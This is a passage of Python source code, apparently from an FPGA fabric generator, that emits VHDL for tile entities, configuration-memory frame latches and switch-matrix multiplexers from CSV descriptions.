print('signal\t'+'conf_data'+'\t:\t STD_LOGIC_VECTOR('+str(BEL_counter+NuberOfSwitchMatricesWithConfigPort)+' downto 0);', file=file)
if GlobalConfigBitsCounter > 0:
print('signal \t ConfigBits :\t STD_LOGIC_VECTOR (NoConfigBits -1 downto 0);', file=file)
# architecture body
print('\n'+'begin'+'\n', file=file)
# Cascading of routing for wires spanning more than one tile
print('-- Cascading of routing for wires spanning more than one tile', file=file)
for line in tile_description:
if line[0] in ['NORTH','EAST','SOUTH','WEST']:
span=abs(int(line[X_offset]))+abs(int(line[Y_offset]))
            # in case a signal spans 2 or more tiles in any direction
if (span >= 2) and (line[source_name]!='NULL') and (line[destination_name]!='NULL'):
print(line[source_name]+'('+line[source_name]+'\'high - '+str(line[wires])+' downto 0)',end='', file=file)
print(' <= '+line[destination_name]+'('+line[destination_name]+'\'high downto '+str(line[wires])+');', file=file)
# top configuration data daisy chaining
if ConfigBitMode == 'FlipFlopChain':
print('-- top configuration data daisy chaining', file=file)
print('conf_data(conf_data\'low) <= CONFin; -- conf_data\'low=0 and CONFin is from tile entity', file=file)
print('CONFout <= conf_data(conf_data\'high); -- CONFout is from tile entity', file=file)
# the <entity>_ConfigMem module is only parametrized through generics, so we hard code its instantiation here
if ConfigBitMode == 'frame_based' and GlobalConfigBitsCounter > 0:
print('\n-- configuration storage latches', file=file)
print('Inst_'+entity+'_ConfigMem : '+entity+'_ConfigMem', file=file)
print('\tPort Map( ' , file=file)
print('\t\t FrameData \t =>\t FrameData, ' , file=file)
print('\t\t FrameStrobe \t =>\t FrameStrobe, ' , file=file)
print('\t\t ConfigBits \t =>\t ConfigBits );' , file=file)
# BEL component instantiations
print('\n-- BEL component instantiations\n', file=file)
All_BEL_Inputs = [] # the right hand signal name which gets a BEL prefix
All_BEL_Outputs = [] # the right hand signal name which gets a BEL prefix
left_All_BEL_Inputs = [] # the left hand port name which does not get a BEL prefix
left_All_BEL_Outputs = [] # the left hand port name which does not get a BEL prefix
BEL_counter = 0
BEL_ConfigBitsCounter = 0
for line in tile_description:
if line[0] == 'BEL':
BEL_Inputs = [] # the right hand signal name which gets a BEL prefix
BEL_Outputs = [] # the right hand signal name which gets a BEL prefix
left_BEL_Inputs = [] # the left hand port name which does not get a BEL prefix
left_BEL_Outputs = [] # the left hand port name which does not get a BEL prefix
ExternalPorts = []
if len(line) >= 3: # we use the third column to specify an optional BEL prefix
BEL_prefix_string = line[BEL_prefix]
else:
BEL_prefix_string = ''
# the BEL I/Os that go to the switch matrix
BEL_Inputs, BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position], BEL_Prefix=BEL_prefix_string)
left_BEL_Inputs, left_BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position])
# the BEL I/Os that go to the tile top entity
# ExternalPorts = GetComponentPortsFromFile(line[VHDL_file_position], port='external', BEL_Prefix=BEL_prefix_string)
ExternalPorts = GetComponentPortsFromFile(line[VHDL_file_position], port='external')
            # we remember All_BEL_Inputs and All_BEL_Outputs as we need these pins for the switch matrix
All_BEL_Inputs = All_BEL_Inputs + BEL_Inputs
All_BEL_Outputs = All_BEL_Outputs + BEL_Outputs
left_All_BEL_Inputs = left_All_BEL_Inputs + left_BEL_Inputs
left_All_BEL_Outputs = left_All_BEL_Outputs + left_BEL_Outputs
EntityName = GetComponentEntityNameFromFile(line[VHDL_file_position])
print('Inst_'+BEL_prefix_string+EntityName+' : '+EntityName, file=file)
print('\tPort Map(', file=file)
for k in range(len(BEL_Inputs+BEL_Outputs)):
print('\t\t',(left_BEL_Inputs+left_BEL_Outputs)[k],' => ',(BEL_Inputs+BEL_Outputs)[k],',', file=file)
# top level I/Os (if any) just get connected directly
if ExternalPorts != []:
print('\t -- I/O primitive pins go to tile top level entity (not further parsed) ', file=file)
for item in ExternalPorts:
# print('DEBUG ExternalPort :',item)
port = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
port=(replace(port, substitutions))
if re.search('SHARED_PORT', item):
print('\t\t',port,' => '+port,',', file=file)
else: # if not SHARED_PORT then add BEL_prefix_string to signal name
print('\t\t',port,' => '+BEL_prefix_string+port,',', file=file)
# global configuration port
if ConfigBitMode == 'FlipFlopChain':
GenerateVHDL_Conf_Instantiation(file=file, counter=BEL_counter, close=True)
if ConfigBitMode == 'frame_based':
BEL_ConfigBits = GetNoConfigBitsFromFile(line[VHDL_file_position])
if BEL_ConfigBits != 'NULL':
if int(BEL_ConfigBits) == 0:
#print('\t\t ConfigBits => (others => \'-\') );\n', file=file)
print('\t\t );\n', file=file)
else:
print('\t\t ConfigBits => ConfigBits ( '+str(BEL_ConfigBitsCounter + int(BEL_ConfigBits))+' -1 downto '+str(BEL_ConfigBitsCounter)+' ) );\n', file=file)
BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
# for the next BEL (if any) for cascading configuration chain (this information is also needed for chaining the switch matrix)
BEL_counter += 1
# switch matrix component instantiation
# important to know:
    # Each switch matrix entity is built up in a specific order:
    # 1.a) interconnect wire INPUTS (in the order defined by the fabric file)
# 2.a) BEL primitive INPUTS (in the order the BEL-VHDLs are listed in the fabric CSV)
# within each BEL, the order from the entity is maintained
# Note that INPUTS refers to the view of the switch matrix! Which corresponds to BEL outputs at the actual BEL
# 3.a) JUMP wire INPUTS (in the order defined by the fabric file)
# 1.b) interconnect wire OUTPUTS
# 2.b) BEL primitive OUTPUTS
# Again: OUTPUTS refers to the view of the switch matrix which corresponds to BEL inputs at the actual BEL
# 3.b) JUMP wire OUTPUTS
# The switch matrix uses single bit ports (std_logic and not std_logic_vector)!!!
print('\n-- switch matrix component instantiation\n', file=file)
for line in tile_description:
if line[0] == 'MATRIX':
BEL_Inputs = []
BEL_Outputs = []
BEL_Inputs, BEL_Outputs = GetComponentPortsFromFile(line[VHDL_file_position])
EntityName = GetComponentEntityNameFromFile(line[VHDL_file_position])
print('Inst_'+EntityName+' : '+EntityName, file=file)
print('\tPort Map(', file=file)
# for port in BEL_Inputs + BEL_Outputs:
# print('\t\t',port,' => ',port,',', file=file)
Inputs = []
Outputs = []
TopInputs = []
TopOutputs = []
# Inputs, Outputs = GetTileComponentPorts(tile_description, mode='SwitchMatrixIndexed')
# changed to: AutoSwitchMatrixIndexed
Inputs, Outputs = GetTileComponentPorts(tile_description, mode='AutoSwitchMatrixIndexed')
# TopInputs, TopOutputs = GetTileComponentPorts(tile_description, mode='TopIndexed')
# changed to: AutoTopIndexed
TopInputs, TopOutputs = GetTileComponentPorts(tile_description, mode='AutoTopIndexed')
for k in range(len(BEL_Inputs+BEL_Outputs)):
print('\t\t',(BEL_Inputs+BEL_Outputs)[k],' => ',end='', file=file)
# note that the BEL outputs (e.g., from the slice component) are the switch matrix inputs
print((Inputs+All_BEL_Outputs+AllJumpWireList+TopOutputs+All_BEL_Inputs+AllJumpWireList)[k], end='', file=file)
if NuberOfSwitchMatricesWithConfigPort > 0:
print(',', file=file)
else:
# stupid VHDL does not allow us to have a ',' for the last port connection, so we need the following for NuberOfSwitchMatricesWithConfigPort==0
if k < ((len(BEL_Inputs+BEL_Outputs)) - 1):
print(',', file=file)
if NuberOfSwitchMatricesWithConfigPort > 0:
if ConfigBitMode == 'FlipFlopChain':
GenerateVHDL_Conf_Instantiation(file=file, counter=BEL_counter, close=False)
# print('\t -- GLOBAL all primitive pins for configuration (not further parsed) ', file=file)
# print('\t\t MODE => Mode, ', file=file)
# print('\t\t CONFin => conf_data('+str(BEL_counter)+'), ', file=file)
# print('\t\t CONFout => conf_data('+str(BEL_counter+1)+'), ', file=file)
# print('\t\t CLK => CLK ', file=file)
if ConfigBitMode == 'frame_based':
BEL_ConfigBits = GetNoConfigBitsFromFile(line[VHDL_file_position])
if BEL_ConfigBits != 'NULL':
# print('DEBUG:',BEL_ConfigBits)
print('\t\t ConfigBits => ConfigBits ( '+str(BEL_ConfigBitsCounter + int(BEL_ConfigBits))+' -1 downto '+str(BEL_ConfigBitsCounter)+' ) ', file=file)
BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
print('\t\t ); ', file=file)
print('\n'+'end Behavioral;'+'\n', file=file)
return
def GenerateConfigMemInit( tile_description, entity, file, GlobalConfigBitsCounter ):
# write configuration bits to frame mapping init file (e.g. 'LUT4AB_ConfigMem.init.csv')
# this file can be modified and saved as 'LUT4AB_ConfigMem.csv' (without the '.init')
BitsLeftToPackInFrames = GlobalConfigBitsCounter
initCSV = []
one_line = []
one_line.append('#frame_name')
one_line.append('frame_index')
one_line.append('bits_used_in_frame')
one_line.append('used_bits_mask')
one_line.append('ConfigBits_ranges')
initCSV.append(one_line)
for k in range(int(MaxFramesPerCol)):
one_line = []
# frame0, frame1, ...
one_line.append('frame'+str(k))
		# and the index (0, 1, 2, ...), in case we need it
one_line.append(str(k))
# size of the frame in bits
if BitsLeftToPackInFrames >= FrameBitsPerRow:
one_line.append(str(FrameBitsPerRow))
# generate a string encoding a '1' for each flop used
FrameBitsMask = ('1' * FrameBitsPerRow)
tmp_one_line = ''
for k in range(len(FrameBitsMask)):
tmp_one_line = tmp_one_line + FrameBitsMask[k]
if ((k%4)==3) and (k != (len(FrameBitsMask)-1)): # after every 4th character add a '_'
tmp_one_line = tmp_one_line + '_' # some "pretty" printing, results in '1111_1111_1...'
one_line.append(tmp_one_line)
one_line.append(str(BitsLeftToPackInFrames-1)+':'+str(BitsLeftToPackInFrames-FrameBitsPerRow))
BitsLeftToPackInFrames = BitsLeftToPackInFrames - FrameBitsPerRow
else:
one_line.append(str(BitsLeftToPackInFrames))
# generate a string encoding a '1' for each flop used
# this will allow us to kick out flops in the middle (e.g. for alignment padding)
FrameBitsMask = ('1' * BitsLeftToPackInFrames + '0' * (FrameBitsPerRow-BitsLeftToPackInFrames))
tmp_one_line = ''
for k in range(len(FrameBitsMask)):
tmp_one_line = tmp_one_line + FrameBitsMask[k]
if ((k%4)==3) and (k != (len(FrameBitsMask)-1)): # after every 4th character add a '_'
tmp_one_line = tmp_one_line + '_' # some "pretty" printing, results in '1111_1111_1...'
one_line.append(tmp_one_line)
if BitsLeftToPackInFrames > 0:
one_line.append(str(BitsLeftToPackInFrames-1)+':0')
else:
one_line.append('# NULL')
BitsLeftToPackInFrames = 0; # will have to be 0 if already 0 or if we just allocate the last bits
# The mapping into frames is described as a list of index ranges applied to the ConfigBits vector
		# use '2' for a single bit; '5:0' for a downto range; multiple ranges can be specified in optional consecutive comma separated fields (and get concatenated)
# default is counting top down
# attach line to CSV
initCSV.append(one_line)
tmp = numpy.asarray(initCSV)
numpy.savetxt(entity+'.init.csv', tmp, fmt='%s', delimiter=",")
return initCSV
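# Illustrative example (a sketch, not generated by the code above): for a hypothetical tile
# with 100 configuration bits, FrameBitsPerRow=32 and MaxFramesPerCol=20, the first rows of
# the generated '<entity>.init.csv' would look roughly like this (ranges count top down):
# #frame_name,frame_index,bits_used_in_frame,used_bits_mask,ConfigBits_ranges
# frame0,0,32,1111_1111_1111_1111_1111_1111_1111_1111,99:68
# frame1,1,32,1111_1111_1111_1111_1111_1111_1111_1111,67:36
# frame2,2,32,1111_1111_1111_1111_1111_1111_1111_1111,35:4
# frame3,3,4,1111_0000_0000_0000_0000_0000_0000_0000,3:0
# frame4,4,0,0000_0000_0000_0000_0000_0000_0000_0000,# NULL
# ... (the remaining frames up to frame19 are all-zero '# NULL' entries)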
def GenerateConfigMemVHDL( tile_description, entity, file ):
# count total number of configuration bits for tile
GlobalConfigBitsCounter = 0
for line in tile_description:
if (line[0] == 'BEL') or (line[0] == 'MATRIX'):
if (GetNoConfigBitsFromFile(line[VHDL_file_position])) != 'NULL':
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(GetNoConfigBitsFromFile(line[VHDL_file_position]))
# we use a file to describe the exact configuration bits to frame mapping
# the following command generates an init file with a simple enumerated default mapping (e.g. 'LUT4AB_ConfigMem.init.csv')
# if we run this function again, but have such a file (without the .init), then that mapping will be used
MappingFile = GenerateConfigMemInit( tile_description, entity, file, GlobalConfigBitsCounter )
# test if we have a bitstream mapping file
# if not, we will take the default, which was passed on from GenerateConfigMemInit
if os.path.exists(entity+'.csv'):
print('# found bitstream mapping file '+entity+'.csv'+' for tile '+tile_description[0][0])
MappingFile = [i.strip('\n').split(',') for i in open(entity+'.csv')]
# clean comments empty lines etc. in the mapping file
MappingFile = RemoveComments(MappingFile)
	# clean the '_' symbols in the used_bits_mask field (they had been introduced to make that field a little more readable)
for line in MappingFile:
# TODO does not like white spaces tabs etc
# print('DEBUG BEFORE line[used_bits_mask]:',entity ,line[frame_name] ,line[used_bits_mask])
line[used_bits_mask] = re.sub('_', '', line[used_bits_mask])
# print('DEBUG AFTER line[used_bits_mask]:',entity ,line[frame_name] ,line[used_bits_mask])
# we should have as many lines as we have frames (=MaxFramesPerCol)
if str(len(MappingFile)) != str(MaxFramesPerCol):
print('WARNING: the bitstream mapping file has only '+str(len(MappingFile))+' entries but MaxFramesPerCol is '+str(MaxFramesPerCol))
	# we also check used_bits_mask (a vector that is as long as a frame and contains a '1' for each used bit and a '0' for each unused (padded) bit)
UsedBitsCounter = 0
for line in MappingFile:
if line[used_bits_mask].count('1') > FrameBitsPerRow:
			raise ValueError('bitstream mapping file '+entity+'.csv has too many 1-elements in bitmask for frame : '+line[frame_name])
if (line[used_bits_mask].count('1') + line[used_bits_mask].count('0')) != FrameBitsPerRow:
# print('DEBUG LINE: ', line)
raise ValueError('bitstream mapping file '+entity+'.csv has a too long or short bitmask for frame : '+line[frame_name])
# we also count the used bits over all frames
UsedBitsCounter += line[used_bits_mask].count('1')
if UsedBitsCounter != GlobalConfigBitsCounter:
		raise ValueError('bitstream mapping file '+entity+'.csv has a bitmask mismatch; bitmask has in total '+str(UsedBitsCounter)+' 1-values for '+str(GlobalConfigBitsCounter)+' bits')
	# write entity
GenerateVHDL_Header(file, entity, package=Package, NoConfigBits=str(GlobalConfigBitsCounter), MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow))
# the port definitions are generic
print('\t\t FrameData: in STD_LOGIC_VECTOR( FrameBitsPerRow -1 downto 0 );', file=file)
print('\t\t FrameStrobe: in STD_LOGIC_VECTOR( MaxFramesPerCol -1 downto 0 );', file=file)
print('\t\t ConfigBits : out STD_LOGIC_VECTOR( NoConfigBits -1 downto 0 )', file=file)
print('\t\t );', file=file)
print('end entity;\n', file=file)
# declare architecture
print('architecture Behavioral of '+str(entity)+' is\n', file=file)
# one_line('frame_name')('frame_index')('bits_used_in_frame')('used_bits_mask')('ConfigBits_ranges')
# frame signal declaration ONLY for the bits actually used
UsedFrames = [] # keeps track about the frames that are actually used
	AllConfigBitsOrder = [] # stores a list of ConfigBits indices in exactly the order defined in the range statements in the frames
for line in MappingFile:
bits_used_in_frame = line[used_bits_mask].count('1')
if bits_used_in_frame > 0:
print('signal '+line[frame_name]+' \t:\t STD_LOGIC_VECTOR( '+str(bits_used_in_frame)+' -1 downto 0);', file=file)
UsedFrames.append(line[frame_index])
# The actual ConfigBits are given as address ranges starting at position ConfigBits_ranges
ConfigBitsOrder = []
for RangeItem in line[ConfigBits_ranges:]:
if ':' in RangeItem: # we have a range
left, right = re.split(':',RangeItem)
left = int(left)
right = int(right)
if left < right:
step = 1
else:
step = -1
right += step # this makes the python range inclusive, otherwise the last item (which is actually right) would be missing
for k in range(left,right,step):
if k in ConfigBitsOrder:
raise ValueError('Configuration bit index '+str(k)+' already allocated in ', entity, line[frame_name])
else:
ConfigBitsOrder.append(int(k))
elif RangeItem.isdigit():
if int(RangeItem) in ConfigBitsOrder:
raise ValueError('Configuration bit index '+str(RangeItem)+' already allocated in ', entity, line[frame_name])
else:
ConfigBitsOrder.append(int(RangeItem))
else:
# raise ValueError('Range '+str(RangeItem)+' cannot be resolved for frame : '+line[frame_name])
print('Range '+str(RangeItem)+' cannot be resolved for frame : '+line[frame_name])
print('DEBUG:',line)
if len(ConfigBitsOrder) != bits_used_in_frame:
				raise ValueError('ConfigBitsOrder definition mismatch: number of 1s in mask does not match ConfigBits_ranges for frame : '+line[frame_name])
AllConfigBitsOrder += ConfigBitsOrder
# begin architecture body
print('\nbegin\n' , file=file)
# instantiate latches for only the used frame bits
print('-- instantiate frame latches' , file=file)
AllConfigBitsCounter = 0
for frame in UsedFrames:
used_bits = MappingFile[int(frame)][int(used_bits_mask)]
# print('DEBUG: ',entity, used_bits,' : ',AllConfigBitsOrder)
for k in range(FrameBitsPerRow):
# print('DEBUG: ',entity, used_bits,' : ',k, used_bits[k],'AllConfigBitsCounter',AllConfigBitsCounter, str(AllConfigBitsOrder[AllConfigBitsCounter]))
if used_bits[k] == '1':
print('Inst_'+MappingFile[int(frame)][int(frame_name)]+'_bit'+str(FrameBitsPerRow-1-k)+' : LHQD1' , file=file)
print('Port Map (' , file=file)
# The next one is a little tricky:
				# k iterates over the bit_mask left to right from k=0..(FrameBitsPerRow-1) (k=0 is the left-most (=first) character)
# But that character represents the MSB inside the frame, which iterates FrameBitsPerRow-1..0
# bit_mask[0], bit_mask[1], bit_mask[2], ...
# FrameData[FrameBitsPerRow-1-0], FrameData[FrameBitsPerRow-1-1], FrameData[FrameBitsPerRow-1-2],
print('\t D \t=>\t FrameData('+str(FrameBitsPerRow-1-k)+'), ' , file=file)
print('\t E \t=>\t FrameStrobe('+str(frame)+'), ' , file=file)
print('\t Q \t=>\t ConfigBits ('+str(AllConfigBitsOrder[AllConfigBitsCounter])+') ); \n ' , file=file)
AllConfigBitsCounter += 1
print('\nend architecture;\n' , file=file)
return
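# Example use (sketch only): generating the ConfigMem VHDL for a hypothetical 'LUT4AB' tile.
# 'tile_description' is assumed to be the parsed tile section from the fabric CSV, and the
# globals (FrameBitsPerRow, MaxFramesPerCol, Package, ...) are assumed to be set already.
# with open('LUT4AB_ConfigMem.vhdl', 'w') as f:
#     GenerateConfigMemVHDL(tile_description, 'LUT4AB_ConfigMem', f)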
def PrintCSV_FileInfo( CSV_FileName ):
CSVFile = [i.strip('\n').split(',') for i in open(CSV_FileName)]
print('Tile: ', str(CSVFile[0][0]), '\n')
# print('DEBUG:',CSVFile)
print('\nInputs: \n')
CSVFileRows=len(CSVFile)
# for port in CSVFile[0][1:]:
line = CSVFile[0]
for k in range(1,len(line)):
PortList = []
PortCount = 0
for j in range(1,len(CSVFile)):
if CSVFile[j][k] != '0':
PortList.append(CSVFile[j][0])
PortCount += 1
print(line[k], ' connects to ',PortCount,' ports: ', PortList)
print('\nOutputs: \n')
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size = 0
PortList = []
# for port in line[1:]:
# if port != '0':
for k in range(1,len(line)):
if line[k] != '0':
mux_size += 1
PortList.append(CSVFile[0][k])
print(line[0],',',str(mux_size),', Source port list: ', PortList)
return
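# Example use (sketch, hypothetical file name): print the fan-in/fan-out statistics of a
# switch matrix adjacency matrix:
# PrintCSV_FileInfo('LUT4AB_switch_matrix.csv')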
def GenTileSwitchMatrixVHDL( tile, CSV_FileName, file ):
print('### Read ',str(tile),' csv file ###')
CSVFile = [i.strip('\n').split(',') for i in open(CSV_FileName)]
# clean comments empty lines etc. in the mapping file
CSVFile = RemoveComments(CSVFile)
# sanity check if we have the right CSV file
if tile != CSVFile[0][0]:
raise ValueError('top left element in CSV file does not match tile type in function GenTileSwitchMatrixVHDL')
# we check if all columns contain at least one entry
# basically that a wire entering the switch matrix can also leave that switch matrix.
# When generating the actual multiplexers, we run the same test on the rows...
for x in range(1,len(CSVFile[0])):
ColBitCounter = 0
for y in range(1,len(CSVFile)):
if CSVFile[y][x] == '1': # column-by-column scan
ColBitCounter += 1
if ColBitCounter == 0: # if we never counted, it may point to a problem
print('WARNING: input port '+CSVFile[0][x]+' of switch matrix in Tile '+CSVFile[0][0]+' is not used (from function GenTileSwitchMatrixVHDL)')
# we pass the NumberOfConfigBits as a comment in the beginning of the file.
	# This makes it easier to generate the configuration port only if needed later, when building the fabric, where we only work with the VHDL files
GlobalConfigBitsCounter = 0
mux_size_list = []
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
mux_size_list.append(mux_size)
if mux_size >= 2:
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(math.ceil(math.log2(mux_size)))
print('-- NumberOfConfigBits:'+str(GlobalConfigBitsCounter), file=file)
# VHDL header
entity = tile+'_switch_matrix'
GenerateVHDL_Header(file, entity, package=Package, NoConfigBits=str(GlobalConfigBitsCounter))
# input ports
print('\t\t -- switch matrix inputs', file=file)
# CSVFile[0][1:]: starts in the first row from the second element
for port in CSVFile[0][1:]:
		# the following conditional is used to capture GND and VDD so they do not show up in the switch matrix port list
if re.search('^GND', port, flags=re.IGNORECASE) or re.search('^VCC', port, flags=re.IGNORECASE) or re.search('^VDD', port, flags=re.IGNORECASE):
pass # maybe needed one day
else:
print('\t\t ',port,'\t: in \t STD_LOGIC;', file=file)
# output ports
for line in CSVFile[1:]:
print('\t\t ',line[0],'\t: out \t STD_LOGIC;', file=file)
# this is a shared text block finishes the header and adds configuration port
if GlobalConfigBitsCounter > 0:
GenerateVHDL_EntityFooter(file, entity, ConfigPort=True)
else:
GenerateVHDL_EntityFooter(file, entity, ConfigPort=False)
# constant declaration
# we may use the following in the switch matrix for providing '0' and '1' to a mux input:
print('constant GND0\t : std_logic := \'0\';', file=file)
print('constant GND\t : std_logic := \'0\';', file=file)
print('constant VCC0\t : std_logic := \'1\';', file=file)
print('constant VCC\t : std_logic := \'1\';', file=file)
print('constant VDD0\t : std_logic := \'1\';', file=file)
print('constant VDD\t : std_logic := \'1\';', file=file)
print('\t', file=file)
# signal declaration
for k in range(1,len(CSVFile),1):
print('signal \t ',CSVFile[k][0]+'_input','\t:\t std_logic_vector(',str(mux_size_list[k-1]),'- 1 downto 0 );', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
if SwitchMatrixDebugSignals == True:
print('', file=file)
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
if mux_size >= 2:
print('signal DEBUG_select_'+str(line[0])+'\t: STD_LOGIC_VECTOR ('+str(int(math.ceil(math.log2(mux_size))))+' -1 downto 0);' , file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
# print('debug', file=file)
#
# mux_size_list = []
# ConfigBitsCounter = 0
# for line in CSVFile[1:]:
# # we first count the number of multiplexer inputs
# mux_size=0
# for port in line[1:]:
# # print('debug: ',port)
# if port != '0':
# mux_size += 1
# mux_size_list.append(mux_size)
# if mux_size >= 2:
# print('signal \t ',line[0]+'_input','\t:\t std_logic_vector(',str(mux_size),'- 1 downto 0 );', file=file)
# # "mux_size" tells us the number of mux inputs and "int(math.ceil(math.log2(mux_size)))" the number of configuration bits
# # we count all bits needed to declare a corresponding shift register
# ConfigBitsCounter = ConfigBitsCounter + int(math.ceil(math.log2(mux_size)))
print('\n-- The configuration bits (if any) are just a long shift register', file=file)
print('\n-- This shift register is padded to an even number of flops/latches', file=file)
	# we only generate configuration bits if we really need configuration bits
# for example in terminating switch matrices at the fabric borders, we may just change direction without any switching
if GlobalConfigBitsCounter > 0:
if ConfigBitMode == 'ff_chain':
print('signal \t ConfigBits :\t unsigned( '+str(GlobalConfigBitsCounter)+'-1 downto 0 );', file=file)
if ConfigBitMode == 'FlipFlopChain':
# print('DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG ConfigBitMode == FlipFlopChain')
# we pad to an even number of bits: (int(math.ceil(ConfigBitCounter/2.0))*2)
print('signal \t ConfigBits :\t unsigned( '+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1 downto 0 );', file=file)
print('signal \t ConfigBitsInput :\t unsigned( '+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1 downto 0 );', file=file)
# begin architecture
print('\nbegin\n', file=file)
# the configuration bits shift register
# again, we add this only if needed
if GlobalConfigBitsCounter > 0:
if ConfigBitMode == 'ff_chain':
print( '-- the configuration bits shift register ' , file=file)
print( 'process(CLK) ' , file=file)
print( 'begin ' , file=file)
print( '\t'+ 'if CLK\'event and CLK=\'1\' then ' , file=file)
print( '\t'+'\t'+ 'if mode=\'1\' then --configuration mode ' , file=file)
print( '\t'+'\t'+'\t'+ 'ConfigBits <= CONFin & ConfigBits(ConfigBits\'high downto 1); ' , file=file)
print( '\t'+'\t'+ 'end if; ' , file=file)
print( '\t'+ 'end if; ' , file=file)
print( 'end process; ' , file=file)
print( 'CONFout <= ConfigBits(ConfigBits\'high); ' , file=file)
print(' \n' , file=file)
# L:for k in 0 to 196 generate
# inst_LHQD1a : LHQD1
# Port Map(
# D => ConfigBitsInput(k*2),
# E => CLK,
# Q => ConfigBits(k*2) ) ;
# inst_LHQD1b : LHQD1
# Port Map(
# D => ConfigBitsInput((k*2)+1),
# E => MODE,
# Q => ConfigBits((k*2)+1) );
# end generate;
if ConfigBitMode == 'FlipFlopChain':
# print('DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG ConfigBitMode == FlipFlopChain')
print( 'ConfigBitsInput <= ConfigBits(ConfigBitsInput\'high-1 downto 0) & CONFin; \n ' , file=file)
print( '-- for k in 0 to Conf/2 generate ' , file=file)
print( 'L: for k in 0 to '+str(int(math.ceil(GlobalConfigBitsCounter/2.0))-1)+' generate ' , file=file)
print( '\t'+ ' inst_LHQD1a : LHQD1 ' , file=file)
print( '\t'+ '\t'+ 'Port Map( ' , file=file)
print( '\t'+ '\t'+ 'D => ConfigBitsInput(k*2), ' , file=file)
print( '\t'+ '\t'+ 'E => CLK, ' , file=file)
print( '\t'+ '\t'+ 'Q => ConfigBits(k*2) ); ' , file=file)
print( ' ' , file=file)
print( '\t'+ ' inst_LHQD1b : LHQD1 ' , file=file)
print( '\t'+ '\t'+ 'Port Map( ' , file=file)
print( '\t'+ '\t'+ 'D => ConfigBitsInput((k*2)+1),' , file=file)
print( '\t'+ '\t'+ 'E => MODE,' , file=file)
print( '\t'+ '\t'+ 'Q => ConfigBits((k*2)+1) ); ' , file=file)
print( 'end generate; \n ' , file=file)
print('CONFout <= ConfigBits(ConfigBits\'high); ' , file=file)
print(' \n' , file=file)
# the switch matrix implementation
# we use the following variable to count the configuration bits of a long shift register which actually holds the switch matrix configuration
ConfigBitstreamPosition = 0
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
# print('debug: ',port)
if port != '0':
mux_size += 1
print('-- switch matrix multiplexer ',line[0],'\t\tMUX-'+str(mux_size), file=file)
if mux_size == 0:
print('-- WARNING unused multiplexer MUX-'+str(line[0]), file=file)
print('WARNING: unused multiplexer MUX-'+str(line[0])+' in tile '+str(CSVFile[0][0]))
		# just route through : can be used for auxiliary wires or diagonal routing (Manhattan style: just go through a switch matrix when turning)
		# can also be used to tap a wire. A double with a mid is nothing else than a single cascaded with another single, where the second single has only one '1' to cascade from the first single
if mux_size == 1:
port_index = 0
for port in line[1:]:
port_index += 1
if port == '1':
print(line[0],'\t <= \t', CSVFile[0][port_index],';', file=file)
elif port == 'l' or port == 'L' :
print(line[0],'\t <= \t \'0\';', file=file)
elif port == 'h' or port == 'H':
print(line[0],'\t <= \t \'1\';', file=file)
elif port == '0':
					pass # we add this for the following test to throw an error if an unexpected character is used
else:
raise ValueError('wrong symbol in CSV file (must be 0, 1, H, or L) when executing function GenTileSwitchMatrixVHDL')
# this is the case for a configurable switch matrix multiplexer
if mux_size >= 2:
print(line[0]+'_input','\t <= ', end='', file=file)
port_index = 0
inputs_so_far = 0
# the reversed() changes the direction that we iterate over the line list.
# I changed it such that the left-most entry is located at the end of the concatenated vector for the multiplexing
# This was done such that the index from left-to-right in the adjacency matrix corresponds with the multiplexer select input (index)
# remove "len(line)-" if you remove the reversed(..)
for port in reversed(line[1:]):
port_index += 1
if port != '0':
inputs_so_far += 1
# again the "len(line)-" is needed as we iterate in reverse direction over the line list.
# remove "len(line)-" if you remove the reversed(..)
print(CSVFile[0][len(line)-port_index],end='', file=file)
if inputs_so_far == mux_size:
if int(GenerateDelayInSwitchMatrix) > 0:
print(' after '+str(GenerateDelayInSwitchMatrix)+' ps;', file=file)
else:
print(';', file=file)
else:
print(' & ',end='', file=file)
# int(math.ceil(math.log2(inputs_so_far))) tells us how many configuration bits a multiplexer takes
old_ConfigBitstreamPosition = ConfigBitstreamPosition
ConfigBitstreamPosition = ConfigBitstreamPosition + int(math.ceil(math.log2(inputs_so_far)))
# we have full custom MUX-4 and MUX-16 for which we have to generate code like:
# VHDL example custom MUX4
# inst_MUX4PTv4_J_l_AB_BEG1 : MUX4PTv4
# Port Map(
# IN1 => J_l_AB_BEG1_input(0),
# IN2 => J_l_AB_BEG1_input(1),
# IN3 => J_l_AB_BEG1_input(2),
# IN4 => J_l_AB_BEG1_input(3),
# S1 => ConfigBits(low_362),
			# S2 => ConfigBits(low_362 + 1),
# O => J_l_AB_BEG1 );
# CUSTOM Multiplexers for switch matrix
# CUSTOM Multiplexers for switch matrix
# CUSTOM Multiplexers for switch matrix
if (MultiplexerStyle == 'custom') and (mux_size == 4):
MuxComponentName = 'MUX4PTv4'
if (MultiplexerStyle == 'custom') and (mux_size == 16):
MuxComponentName = 'MUX16PTv2'
if (MultiplexerStyle == 'custom') and (mux_size == 4 or mux_size == 16):
# inst_MUX4PTv4_J_l_AB_BEG1 : MUX4PTv4
print('inst_'+MuxComponentName+'_'+line[0]+' : '+MuxComponentName+'\n',end='', file=file)
# Port Map(
